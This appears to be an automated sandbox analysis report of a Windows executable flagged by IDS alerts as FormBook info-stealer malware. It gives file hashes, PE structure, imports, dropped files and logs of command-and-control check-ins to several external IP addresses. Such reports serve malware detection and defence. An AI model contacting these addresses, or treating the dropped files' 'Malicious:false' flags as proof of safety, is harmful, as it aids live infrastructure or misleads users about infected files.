                      SHA-512:F9E3A657871992F189CACF874C5F0E3ABE79B8FBA802662D243716D9F16766EF5A4699AC2DFF67302F0ADA26F858A3E2033EB10A915AED4A7F7A92BA1976A821
                      Malicious:false
                      Reputation:low
                      Preview:EA06..0..M...../...c..f@.[....P.].@.[..+8.2.f`........e..:......7..7..#|Sp.....?. ... .....|. ..`....C.j.}.X..75.}......`.}.@(>...Y..w4.m....0....,.....}|.0....r............._|S.*......0.o..w...F...;...|60).....|3@...h.Q.L@%.7.......7.T.g.*.5..?.......2.F.g.......5.f...y4.^...>p......B...|.._...?v`Q......M....(...=.....c...f.....W.9......3._.@..e...A..k ...a....O>).4..f.}..?...3 ....C......#.X.g.8.... 6.......1.Y.F?.....Gc.....@#...........l`F..E..c........#..]..c...A....<|.....<~.._.]..........y4...@.~{02/.3...._4...v .O.....|.@jO......M..>`.......|.~....,.m.X..&.........>.. >p5....<~.P....a..@..9.Z.,.X.X...4.,...O~p..L.C....A..2.......p&.....K..@..b....@..X.G.3.............. ..?..@|.._<..C....|.P...n.y..@...).j.+.X.->..(..a.&.l......k......>p........X..P!~M..>`./...-..#?......#.^|._.....[....| 7...g.0.h.,aU_.B....Y...}..<...| ..<........|>)..V.....$........B~..A.......|V ./....)_.4..S..J.@H...7..<#.....~3p............> g/..o. ...d).....`5...W..%..D..

                      C:\Users\user\AppData\Local\Temp\done

                      Download File
                      Process:C:\Users\user\Desktop\p4LNUqyKZM.exe
                      File Type:ASCII text, with very long lines (65536), with no line terminators
                      Category:dropped
                      Size (bytes):143370
                      Entropy (8bit):2.6635439737859765
                      Encrypted:false
                      SSDEEP:384:qrYq11YnBr4syyK6/nbWHHnv+ml+uGYNb3WUgQNm0LYQ:4
                      MD5:F654070822A72E49D2736DB338C9CF67
                      SHA1:0BDD7830B96EFF994443226E42341ADDFA2EFF56
                      SHA-256:172337F9788D3B2A89E4BF6A8EF263930C4F7C87740DAE6DED84E454FBC0B639
                      SHA-512:5077A079CBDA6321DF08574566D8F14B367F98A07ECA703FB219B74463C4144DF0A4726EC51B595B45D6F8113DB3512EFD0A1D21C03318925CE3D5B539C805AA
                      Malicious:false
                      Preview:06504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504c650426504c6504d65045650456504e6504b65048650406504c650436504365042650406504b6504e6504c6504f65045650446504b6504865040650406504065040650406504065040650406504c6504f6504565044650476504c65047650406504b6504e6504c6504f6504d650446504965048650486504f6504d650446504b6504865048650406504465047650406504c65045650486504065040650406504065040650406504c6504865045650496504f6504f6504f6504f6504a650466504065045650486504f65045650446504d650486504465042650446504765040650406504

                      C:\Users\user\AppData\Local\Temp\x--942kI

                      Download File
                      Process:C:\Windows\SysWOW64\chkntfs.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                      Category:dropped
                      Size (bytes):114688
                      Entropy (8bit):0.9746603542602881
                      Encrypted:false
                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                      Malicious:false
                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.135919783223942
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:p4LNUqyKZM.exe
                      File size:1'250'816 bytes
                      MD5:4214be98801c44f69b60490a3321e940
                      SHA1:df33635a4f458821d10ce62860a043a960ced09f
                      SHA256:416e839248fccc61a17a02d1513127612b89425f45ddf603800f1def225adb07
                      SHA512:4f24a5ab7dc49ebbccae771dacdd4dd630d57b5691790527f2896d6547318edc846b4bb294b7cf49cc156c234a8d38fc9511c782d7008538b419d626c2d5d413
                      SSDEEP:24576:vqDEvCTbMWu7rQYlBQcBiT6rprG8aVnLgmDaEBVycKdrd8gx:vTvC/MTQYxsWR7aVnLv2msrSg
                      TLSH:A745CF0273D1C062FF9B92334F5AE6515BBC69260123E61F13A81DB9BE701B1563E7A3
                      File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

                      File Icon

                      Icon Hash:aaf3e3e3938382a0

                      Static PE Info

                      General

                      Entrypoint:0x420577
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                      Time Stamp:0x66D4F8E6 [Sun Sep 1 23:29:42 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:1
                      File Version Major:5
                      File Version Minor:1
                      Subsystem Version Major:5
                      Subsystem Version Minor:1
                      Import Hash:948cc502fe9226992dce9417f952fce3

                      Entrypoint Preview

                      Instruction
                      call 00007F48C0BE4BF3h
                      jmp 00007F48C0BE44FFh
                      push ebp
                      mov ebp, esp
                      push esi
                      push dword ptr [ebp+08h]
                      mov esi, ecx
                      call 00007F48C0BE46DDh
                      mov dword ptr [esi], 0049FDF0h
                      mov eax, esi
                      pop esi
                      pop ebp
                      retn 0004h
                      and dword ptr [ecx+04h], 00000000h
                      mov eax, ecx
                      and dword ptr [ecx+08h], 00000000h
                      mov dword ptr [ecx+04h], 0049FDF8h
                      mov dword ptr [ecx], 0049FDF0h
                      ret
                      push ebp
                      mov ebp, esp
                      push esi
                      push dword ptr [ebp+08h]
                      mov esi, ecx
                      call 00007F48C0BE46AAh
                      mov dword ptr [esi], 0049FE0Ch
                      mov eax, esi
                      pop esi
                      pop ebp
                      retn 0004h
                      and dword ptr [ecx+04h], 00000000h
                      mov eax, ecx
                      and dword ptr [ecx+08h], 00000000h
                      mov dword ptr [ecx+04h], 0049FE14h
                      mov dword ptr [ecx], 0049FE0Ch
                      ret
                      push ebp
                      mov ebp, esp
                      push esi
                      mov esi, ecx
                      lea eax, dword ptr [esi+04h]
                      mov dword ptr [esi], 0049FDD0h
                      and dword ptr [eax], 00000000h
                      and dword ptr [eax+04h], 00000000h
                      push eax
                      mov eax, dword ptr [ebp+08h]
                      add eax, 04h
                      push eax
                      call 00007F48C0BE729Dh
                      pop ecx
                      pop ecx
                      mov eax, esi
                      pop esi
                      pop ebp
                      retn 0004h
                      lea eax, dword ptr [ecx+04h]
                      mov dword ptr [ecx], 0049FDD0h
                      push eax
                      call 00007F48C0BE72E8h
                      pop ecx
                      ret
                      push ebp
                      mov ebp, esp
                      push esi
                      mov esi, ecx
                      lea eax, dword ptr [esi+04h]
                      mov dword ptr [esi], 0049FDD0h
                      push eax
                      call 00007F48C0BE72D1h
                      test byte ptr [ebp+08h], 00000001h
                      pop ecx

                      Rich Headers

                      Programming Language:
                      • [ C ] VS2008 SP1 build 30729
                      • [IMP] VS2008 SP1 build 30729

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x5ab0c.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x12f0000x7594.reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc0xd40000x5ab0c0x5ac008b0b669b687608340c32630295e56c2fFalse0.9275891012396694data7.893638866117766IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc0x12f0000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                      Resources

                      NameRVASizeTypeLanguageCountryZLIB Complexity
                      RT_ICON0xd45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                      RT_ICON0xd46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                      RT_ICON0xd47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                      RT_ICON0xd49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                      RT_ICON0xd4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                      RT_ICON0xd4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                      RT_ICON0xd5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                      RT_ICON0xd64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                      RT_ICON0xd69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                      RT_ICON0xd8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                      RT_ICON0xda0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                      RT_MENU0xda4a00x50dataEnglishGreat Britain0.9
                      RT_STRING0xda4f00x594dataEnglishGreat Britain0.3333333333333333
                      RT_STRING0xdaa840x68adataEnglishGreat Britain0.2735961768219833
                      RT_STRING0xdb1100x490dataEnglishGreat Britain0.3715753424657534
                      RT_STRING0xdb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                      RT_STRING0xdbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                      RT_STRING0xdc1f80x466dataEnglishGreat Britain0.3605683836589698
                      RT_STRING0xdc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                      RT_RCDATA0xdc7b80x51dd2data1.0003310330019026
                      RT_GROUP_ICON0x12e58c0x76dataEnglishGreat Britain0.6610169491525424
                      RT_GROUP_ICON0x12e6040x14dataEnglishGreat Britain1.25
                      RT_GROUP_ICON0x12e6180x14dataEnglishGreat Britain1.15
                      RT_GROUP_ICON0x12e62c0x14dataEnglishGreat Britain1.25
                      RT_VERSION0x12e6400xdcdataEnglishGreat Britain0.6181818181818182
                      RT_MANIFEST0x12e71c0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                      Imports

                      DLLImport
                      WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                      VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                      WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                      COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                      MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                      WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                      PSAPI.DLLGetProcessMemoryInfo
                      IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                      USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                      UxTheme.dllIsThemeActive
                      KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                      USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                      GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                      COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                      ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                      SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                      ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                      OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

                      Possible Origin

                      Language of compilation systemCountry where language is spokenMap
                      EnglishGreat Britain

                      Network Behavior

                      Suricata IDS Alerts

                      TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                      2024-09-03T12:47:03.449238+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314975180192.168.2.4162.0.239.141
                      2024-09-03T12:48:22.027549+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314976780192.168.2.43.33.130.190
                      2024-09-03T12:47:05.845810+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314975280192.168.2.4162.0.239.141
                      2024-09-03T12:47:16.668340+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314975580192.168.2.4199.59.243.226
                      2024-09-03T12:46:24.686828+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314973980192.168.2.4199.59.243.226
                      2024-09-03T12:48:08.668881+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314976380192.168.2.4161.97.168.245
                      2024-09-03T12:46:22.131705+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314973880192.168.2.4199.59.243.226
                      2024-09-03T12:48:11.402820+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314976480192.168.2.4161.97.168.245
                      2024-09-03T12:48:25.385798+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314976880192.168.2.43.33.130.190
                      2024-09-03T12:46:36.128432+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314974380192.168.2.4154.23.184.240
                      2024-09-03T12:46:19.589102+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314973780192.168.2.4199.59.243.226
                      2024-09-03T12:48:33.766377+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314977080192.168.2.4218.247.68.184
                      2024-09-03T12:47:14.122963+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314975480192.168.2.4199.59.243.226
                      2024-09-03T12:48:19.457377+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314976680192.168.2.43.33.130.190
                      2024-09-03T12:47:39.022061+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314975980192.168.2.45.144.130.52
                      2024-09-03T12:47:41.568823+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314976080192.168.2.45.144.130.52
                      2024-09-03T12:48:06.104368+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314976280192.168.2.4161.97.168.245
                      2024-09-03T12:47:36.459420+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314975880192.168.2.45.144.130.52
                      2024-09-03T12:47:00.593340+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314975080192.168.2.4162.0.239.141
                      2024-09-03T12:46:33.583797+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314974280192.168.2.4154.23.184.240
                      2024-09-03T12:48:36.350756+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314977180192.168.2.4218.247.68.184
                      2024-09-03T12:47:19.220268+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314975680192.168.2.4199.59.243.226
                      2024-09-03T12:46:38.881573+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314974480192.168.2.4154.23.184.240

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Sep 3, 2024 12:46:03.282625914 CEST4973680192.168.2.445.33.2.79
                      Sep 3, 2024 12:46:03.287559986 CEST804973645.33.2.79192.168.2.4
                      Sep 3, 2024 12:46:03.287651062 CEST4973680192.168.2.445.33.2.79
                      Sep 3, 2024 12:46:03.294533014 CEST4973680192.168.2.445.33.2.79
                      Sep 3, 2024 12:46:03.299559116 CEST804973645.33.2.79192.168.2.4
                      Sep 3, 2024 12:46:03.778975964 CEST804973645.33.2.79192.168.2.4
                      Sep 3, 2024 12:46:03.779367924 CEST804973645.33.2.79192.168.2.4
                      Sep 3, 2024 12:46:03.779378891 CEST804973645.33.2.79192.168.2.4
                      Sep 3, 2024 12:46:03.779580116 CEST4973680192.168.2.445.33.2.79
                      Sep 3, 2024 12:46:03.782857895 CEST4973680192.168.2.445.33.2.79
                      Sep 3, 2024 12:46:03.787590027 CEST804973645.33.2.79192.168.2.4
                      Sep 3, 2024 12:46:19.137413025 CEST4973780192.168.2.4199.59.243.226
                      Sep 3, 2024 12:46:19.142226934 CEST8049737199.59.243.226192.168.2.4
                      Sep 3, 2024 12:46:19.142314911 CEST4973780192.168.2.4199.59.243.226
                      Sep 3, 2024 12:46:19.152934074 CEST4973780192.168.2.4199.59.243.226
                      Sep 3, 2024 12:46:19.157728910 CEST8049737199.59.243.226192.168.2.4
                      Sep 3, 2024 12:46:19.589030027 CEST8049737199.59.243.226192.168.2.4
                      Sep 3, 2024 12:46:19.589055061 CEST8049737199.59.243.226192.168.2.4
                      Sep 3, 2024 12:46:19.589066982 CEST8049737199.59.243.226192.168.2.4
                      Sep 3, 2024 12:46:19.589102030 CEST4973780192.168.2.4199.59.243.226
                      Sep 3, 2024 12:46:20.662336111 CEST4973780192.168.2.4199.59.243.226
                      Sep 3, 2024 12:46:21.680881023 CEST4973880192.168.2.4199.59.243.226
                      Sep 3, 2024 12:46:21.685749054 CEST8049738199.59.243.226192.168.2.4
                      Sep 3, 2024 12:46:21.685862064 CEST4973880192.168.2.4199.59.243.226
                      Sep 3, 2024 12:46:21.696630001 CEST4973880192.168.2.4199.59.243.226
                      Sep 3, 2024 12:46:21.701564074 CEST8049738199.59.243.226192.168.2.4
                      Sep 3, 2024 12:46:22.131633997 CEST8049738199.59.243.226192.168.2.4
                      Sep 3, 2024 12:46:22.131647110 CEST8049738199.59.243.226192.168.2.4
                      Sep 3, 2024 12:46:22.131705046 CEST4973880192.168.2.4199.59.243.226
                      Sep 3, 2024 12:46:22.131743908 CEST8049738199.59.243.226192.168.2.4
                      Sep 3, 2024 12:46:22.131791115 CEST4973880192.168.2.4199.59.243.226
                      Sep 3, 2024 12:46:23.209119081 CEST4973880192.168.2.4199.59.243.226
                      Sep 3, 2024 12:46:24.231967926 CEST4973980192.168.2.4199.59.243.226
                      Sep 3, 2024 12:46:24.236912966 CEST8049739199.59.243.226192.168.2.4
                      Sep 3, 2024 12:46:24.237010002 CEST4973980192.168.2.4199.59.243.226
